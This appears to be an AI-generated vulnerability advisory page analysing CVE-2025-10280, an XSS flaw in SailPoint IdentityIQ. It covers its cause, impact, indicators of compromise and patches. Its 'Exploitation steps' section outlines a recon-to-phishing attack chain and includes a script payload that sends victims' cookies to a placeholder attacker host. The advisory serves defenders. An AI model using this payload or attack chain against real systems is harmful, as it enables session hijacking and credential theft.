CVE-2025-10280
SailPoint IdentityIQ vulnerability analysis and mitigation

Overview

CVE-2025-10280 is a Cross-Site Scripting (XSS) vulnerability in SailPoint IdentityIQ caused by incorrect Content-Type handling in certain web service endpoints. Affected versions include IdentityIQ 8.5, IdentityIQ 8.4 and all 8.4 patch levels prior to 8.4p4, IdentityIQ 8.3 and all 8.3 patch levels prior to 8.3p6, and all prior versions. The vulnerability was published on November 3, 2025, with a patch advisory released by SailPoint on November 12, 2025. It carries a CVSS v3.1 base score of 6.1 (Medium) (SailPoint Advisory, ENISA EUVD).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). Certain IdentityIQ web services that are designed to serve non-HTML content can be accessed via URL paths that force the server to set the Content-Type response header to text/html. Because the content returned by these endpoints is not properly HTML-escaped, a browser interpreting the response as HTML will execute any embedded scripts. This attack pattern aligns with CAPEC-209 (XSS Using MIME Type Mismatch) and requires no authentication (privileges required: none) but does require user interaction, such as a victim clicking a crafted link (SailPoint Advisory, ENISA EUVD).

Impact

Successful exploitation allows an attacker to execute malicious scripts in the context of a victim's browser session within the IdentityIQ application. This can lead to session hijacking, theft of sensitive authentication tokens or credentials, and unauthorized actions performed on behalf of the victim user — including access to identity governance data managed by IdentityIQ. The scope is changed (S:C), meaning the impact extends beyond the vulnerable component to the user's browser environment, with low confidentiality and low integrity impact per the CVSS scoring (SailPoint Advisory).

Exploitability

As of the time of reporting, there is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation (ENISA EUVD). No threat actor attribution has been reported. The EPSS score is approximately 0.041%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires user interaction (e.g., a victim clicking a crafted URL), which reduces the likelihood of mass exploitation.

Exploitation steps

  1. Reconnaissance: Identify internet-facing SailPoint IdentityIQ instances running versions 8.5, 8.4 prior to 8.4p4, or 8.3 prior to 8.3p6 using passive reconnaissance tools (e.g., Shodan, Censys) or by inspecting HTTP response headers for IdentityIQ version indicators.
  2. Identify vulnerable web service endpoints: Enumerate IdentityIQ web service URLs that serve non-HTML content (e.g., JSON or XML responses) but can be accessed via alternative URL paths that trigger an HTML Content-Type response.
  3. Craft malicious URL: Construct a URL targeting a vulnerable endpoint using a path variant that causes the server to respond with Content-Type: text/html, embedding an unescaped script payload in a parameter or path segment (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>).
  4. Deliver to victim: Send the crafted URL to a target user (e.g., an IdentityIQ administrator) via phishing email, social engineering, or by embedding it in a web page the victim is likely to visit.
  5. Script execution: When the victim clicks the link and their browser renders the response as HTML, the injected script executes in the context of the IdentityIQ application origin, enabling session token theft or unauthorized actions (SailPoint Advisory).

Indicators of compromise

  • Network: Unusual HTTP GET requests to IdentityIQ web service endpoints with URL paths that deviate from expected patterns (e.g., paths that force HTML Content-Type on non-HTML services); outbound connections from victim browsers to unknown external domains shortly after accessing IdentityIQ.
  • Logs: IdentityIQ access logs showing requests to web service endpoints with encoded or suspicious characters (<, >, script, %3C, %3E) in URL paths or query parameters; repeated access to the same unusual endpoint from different user accounts.
  • Logs: Web application firewall (WAF) or proxy logs flagging requests containing XSS payloads targeting IdentityIQ service URLs.
  • Process/Session: Unexpected session activity in IdentityIQ audit logs, such as actions performed under a user's account from an unfamiliar IP address or at an unusual time, potentially indicating session hijacking following successful XSS exploitation.

Mitigation and workarounds

SailPoint has released patches addressing this vulnerability. Organizations should upgrade to IdentityIQ 8.4p4 or later (for the 8.4 branch), IdentityIQ 8.3p6 or later (for the 8.3 branch), or the latest available release for version 8.5. As interim measures, administrators should implement strict Web Application Firewall (WAF) rules to block requests containing XSS payloads targeting IdentityIQ endpoints, restrict web service access to authorized users only, and monitor access logs for suspicious activity. Implementing proper output encoding and input validation at the application layer is also recommended as a defense-in-depth measure (SailPoint Advisory).

Community reactions

The vulnerability received standard coverage from vulnerability tracking platforms including Vulners, VulDB, CVEFeed, and CIRCL's vulnerability lookup service shortly after publication. CYFIRMA included it in their weekly intelligence report for November 7, 2025. No notable independent researcher commentary or significant social media discussion has been identified beyond routine aggregation and tracking (CYFIRMA Report).

Additional resources


SourceThis report was generated using AI

Related SailPoint IdentityIQ vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-12341CRITICAL9.8
  • SailPoint IdentityIQ logoSailPoint IdentityIQ
  • cpe:2.3:a:sailpoint:identityiq
NoNoJul 20, 2026
CVE-2024-10905CRITICAL9.8
  • SailPoint IdentityIQ logoSailPoint IdentityIQ
  • cpe:2.3:a:sailpoint:identityiq
NoYesDec 02, 2024
CVE-2026-5712HIGH8.8
  • SailPoint IdentityIQ logoSailPoint IdentityIQ
  • cpe:2.3:a:sailpoint:identityiq
NoNoApr 29, 2026
CVE-2024-2228HIGH8.8
  • SailPoint IdentityIQ logoSailPoint IdentityIQ
  • cpe:2.3:a:sailpoint:identityiq
NoYesMar 22, 2024
CVE-2025-10280MEDIUM6.1
  • SailPoint IdentityIQ logoSailPoint IdentityIQ
  • cpe:2.3:a:sailpoint:identityiq
NoNoNov 03, 2025

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management